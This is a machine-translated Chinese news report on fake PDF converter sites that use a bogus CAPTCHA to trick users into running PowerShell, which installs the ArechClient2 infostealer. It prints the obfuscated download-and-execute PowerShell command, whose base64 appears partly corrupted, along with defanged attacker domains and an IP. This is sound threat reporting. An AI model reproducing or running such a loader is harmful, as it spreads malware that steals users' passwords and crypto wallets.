当心在线PDF转换器诱骗用户安装窃取密码的恶意软件

网络犯罪分子发起了一项复杂的恶意软件活动，利用模仿流行的合法服务 PDFCandy 的虚假 PDF 到 DOCX 转换器网站。

恶意网站，包括 candyxpdf[.] 等域。com 和 CandyConverterPDF[.]com 部署了一种精心设计的社会工程策略，旨在从寻求转换文档格式的毫无戒心的用户那里收集敏感信息。

当用户尝试在这些欺诈平台上转换文档时，他们会看到一个看似合法的界面，其中包含动画加载序列和熟悉的转换选项。

上传文件后，受害者会遇到一个虚假的 CAPTCHA 验证，该验证指示他们按 Windows+R 并粘贴伪装的 PowerShell 命令。执行此命令时，会启动一个复杂的感染链，最终部署 ArechClient2 信息窃取程序。

CloudSEK 研究人员发现，该恶意软件是危险的 SectopRAT 家族的变体，该家族自 2019 年以来一直活跃。

他们的分析显示，该攻击采用了多阶段重定向过程，连接到“bind-new-connect[.]click“，然后下载托管在 IP 地址 172 上的恶意 ”adobe.zip“ 有效负载。86[.]115[.]43.

这种攻击的影响是严重的，因为该恶意软件专门设计用于从受感染的系统中收集浏览器凭据、加密货币钱包信息和其他敏感数据。

该感染展示了先进的规避技术，包括滥用合法的 Windows 实用程序来绕过安全控制。

恶意软件活动的思维导图

感染机制分析

此攻击的核心依赖于用户无意中执行的混淆 PowerShell 命令：-

powershell -win 1 -ep bypass -noni -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgB1AHQALgBXAGUAYgBDAG8AYQBKAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ΘΑΥQANACKAIAB8ACAASQBFAHgA

audiobit.exe

此编码命令会发起一个 Web 请求来下载“adobe.zip”存档，其中包含多个文件，包括恶意的“audiobit[.]exe“ 可执行文件。

执行时，此文件会启动一个合法的 Windows 实用程序 MSBuild.exe，通过一种称为 living-off-the-land 的技术加载 ArechClient2 恶意软件。

该恶意软件执行多种可疑作，包括注册表查询、系统信息发现和凭据搜寻。

该恶意软件会访问机器 GUID、计算机名称并检查支持的语言，然后再继续收集敏感数据，包括存储的密码和加密货币钱包凭据。

建议用户仅使用来自官方来源的受信任的文件转换工具，并对任何请求命令行执行的网站保持警惕，无论界面看起来多么合法。

原文来自: cybersecuritynews.com